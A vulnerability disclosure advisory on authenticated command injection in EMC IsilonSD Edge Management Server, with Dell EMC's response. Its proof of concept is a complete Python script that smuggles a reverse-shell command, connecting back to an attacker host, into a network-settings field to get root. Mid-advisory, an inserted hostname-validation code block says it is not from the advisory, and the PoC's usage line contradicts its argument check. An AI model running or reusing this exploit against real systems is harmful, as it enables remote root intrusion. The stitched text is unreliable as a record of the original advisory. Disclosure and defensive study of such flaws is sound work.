SSD Advisory – EMC IsilonSD Edge Management Server Command Injection

Vulnerability Summary
The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge Management Server version 1.0.1.0005.
IsilonSD Edge Management Server enables you to deploy an industry-leading scale-out NAS operating system on industry-standard hardware. Key benefits of IsilonSD Edge: a simple yet powerful and efficient scale-out storage solution for remote and branch offices; it easily extends your enterprise data lake from the core data center to edge locations; and it enables consolidation and distribution of unstructured data.
Credit
An independent security researcher, Nahuel D. Sánchez from vvvSecurity, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We have informed EMC of the vulnerability on the 24th of April 2017.
The vendor has sent the following statement in response to this advisory:
Dell EMC recently became aware of a potential vulnerability that was disclosed regarding EMC IsilonSD Management Server by third-party researchers. IsilonSD Management Server is a gateway for deploying virtual OneFS clusters on VMware ESXi. Note: IsilonSD Management Server is NOT used for deploying physical OneFS clusters.
Based on the current design of the product, we believe the reported issue does not add any additional security risk to the customer environment. The reported flaw does exist but exploitation of the vulnerability requires a privilege that is considered normal operating privilege and that should be highly protected in any Isilon deployment.
Below are our findings after initial review of the reported issue:

  • The attacker requires knowledge of the password for the IsilonSD Management Server administrator to exploit the issue described in the report
  • The authenticated user can then run OS commands via the reported web interface flaw on the virtual OS where IsilonSD Management Server is deployed. This issue does not allow remote code execution on the virtual OneFS clusters.
  • The IsilonSD Management Server administrator user is considered a highly privileged user and has full access to the underlying virtual OS as part of the product design. Access to the IsilonSD Management Server (including the web interface) and administrative user credentials should be given to trusted users only. Any default credentials should also be changed as part of the best-practice recommendations. Please see the IsilonSD Edge with IsilonSD Management Server Installation and Administration Guide for more information.

Dell EMC continuously reviews the product design for IsilonSD Management Server to identify potential areas of improvement to raise the overall security posture of the product.

Vulnerability Details
A remote authenticated attacker can misuse the IsilonSD management tools (located at https://:5480) to execute arbitrary OS commands. The vulnerability lies in the lack of back-end validation when the network configuration is performed; the front-end validation that exists can be bypassed.
If an attacker accesses the application and changes the hostname to something like “localhost; uname -a”, the “uname -a” command is executed with root privileges.
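The root cause described above is a missing back-end check on network-setting values that are later handed to a shell. The following is an added example of the server-side validation a defender would want on such an endpoint; it is not code from the advisory or from Dell EMC. It assumes hostnames follow RFC 1123 and that the Address, GatewayV4 and SubnetMask fields seen in the PoC request are plain IPv4 dotted-quads; the function names are hypothetical.

```python
import ipaddress
import re

# One RFC 1123 hostname label: letters, digits and hyphens, 1-63 chars,
# not starting or ending with a hyphen. Shell metacharacters such as
# ';', '|', '`', '$', quotes and whitespace cannot match this pattern.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """True only if every dot-separated label is a well-formed RFC 1123 label."""
    if not name or len(name) > 253:
        return False
    labels = name.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def is_valid_ipv4(addr: str) -> bool:
    """Strict dotted-quad check; rejects anything with trailing shell text."""
    try:
        ipaddress.IPv4Address(addr)
        return True
    except ValueError:
        return False


def validate_network_settings(hostname: str, address: str,
                              gateway: str, subnet_mask: str) -> list:
    """Return the names of the request fields that fail validation.

    An empty list means every value is safe to pass on; the handler should
    reject the whole request (HTTP 400) if the list is non-empty, before any
    value reaches an OS command.
    """
    failed = []
    if not is_valid_hostname(hostname):
        failed.append("ServerName")
    for field, value in (("Address", address), ("GatewayV4", gateway),
                         ("SubnetMask", subnet_mask)):
        if not is_valid_ipv4(value):
            failed.append(field)
    return failed


def hostname_argv(hostname: str) -> list:
    """Build the argv list for setting the hostname.

    Hardened pattern: validate, then return a list for subprocess.run() with
    shell=False, so the value is always one argument and never re-parsed by
    a shell. A string passed with shell=True is the vulnerable pattern.
    """
    if not is_valid_hostname(hostname):
        raise ValueError("invalid hostname")
    return ["hostname", hostname]
```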
Proof of Concept
This PoC triggers a reverse shell with root privileges.
Execute the PoC as follows:
python os_command_injection.py https://:5480 administrator
os_command_injection.py

import requests
import sys
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) <> 6:
    print "usage script.py <target_url> <attacker_host> <attacker_port> <username> <password>"
    exit()
target_url = sys.argv[1]
attacker_host = sys.argv[2]
attacker_port = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
headers = {"Content-Type":"application/xml; charset=UTF-8", "Cache-Control": "no-cache", "CIMProtocolVersion": "1.0", "CIMOperation": "MethodCall", "CIMMethod": "%53%65%74%564%41%6E%64%566%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67", "CIMObject": "%72%6F%6F%74/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%6C%6F%63%61%6C%68%6F%73%74%22"}
shellcode = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' % (attacker_host, attacker_port)
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="11" PROTOCOLVERSION="1.0"><SIMPLEREQ><METHODCALL NAME="SetV4AndV6NetworkSetting"><LOCALINSTANCEPATH><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><INSTANCENAME CLASSNAME="VAMI_NetworkSetting"><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">eth0</KEYVALUE></KEYBINDING><KEYBINDING NAME="ServerName"><KEYVALUE VALUETYPE="string">localhost</KEYVALUE></KEYBINDING></INSTANCENAME></LOCALINSTANCEPATH><PARAMVALUE NAME="Address" PARAMTYPE="string"><VALUE>192.168.1.162; %s</VALUE></PARAMVALUE><PARAMVALUE NAME="GatewayV4" PARAMTYPE="string"><VALUE>192.168.1.1</VALUE></PARAMVALUE><PARAMVALUE NAME="SubnetMask" PARAMTYPE="string"><VALUE>255.255.255.0</VALUE></PARAMVALUE><PARAMVALUE NAME="AddressVersions" PARAMTYPE="string"><VALUE>STATICV4+AUTOV6</VALUE></PARAMVALUE></METHODCALL></SIMPLEREQ></MESSAGE></CIM>''' % shellcode
try:
    print "Launching exploit against %s" % target_url
    print "Expecting to receive a reversel shell on host %s port %s" % (attacker_host, attacker_port)
    print "After a few seconds check your netcat..."
    res = requests.post(target_url + "/cimom", auth=(username, password), data=payload, headers=headers, verify=False)
    if res.status_code == 401:
        print "Invalid credentials were specified"
    elif res.status_code <> 200:
        print "There was an error..."
        print res.status_code
        print res.reason
except Exception as e:
    print "There was an error..."
    print e
